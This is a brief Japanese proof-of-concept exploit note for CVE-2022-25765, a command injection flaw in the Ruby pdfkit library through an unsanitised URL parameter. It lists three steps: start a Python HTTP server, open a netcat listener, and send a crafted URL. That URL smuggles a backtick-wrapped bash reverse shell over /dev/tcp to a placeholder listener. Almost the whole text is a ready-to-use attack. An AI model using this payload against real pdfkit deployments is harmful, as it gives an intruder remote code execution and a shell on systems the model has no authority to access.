
CVE-2022-25765 の概念実証エクスプロイト。pdfkit 0.8.6 のサニタイズされていない URL パラメータを介したコマンドインジェクションを実証し、リモートコード実行とリバースシェルを可能にします。
パッケージ pdfkit (バージョン 0.0.0 以降) は、URL が適切にサニタイズされていないため、コマンドインジェクションに対して脆弱です。
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}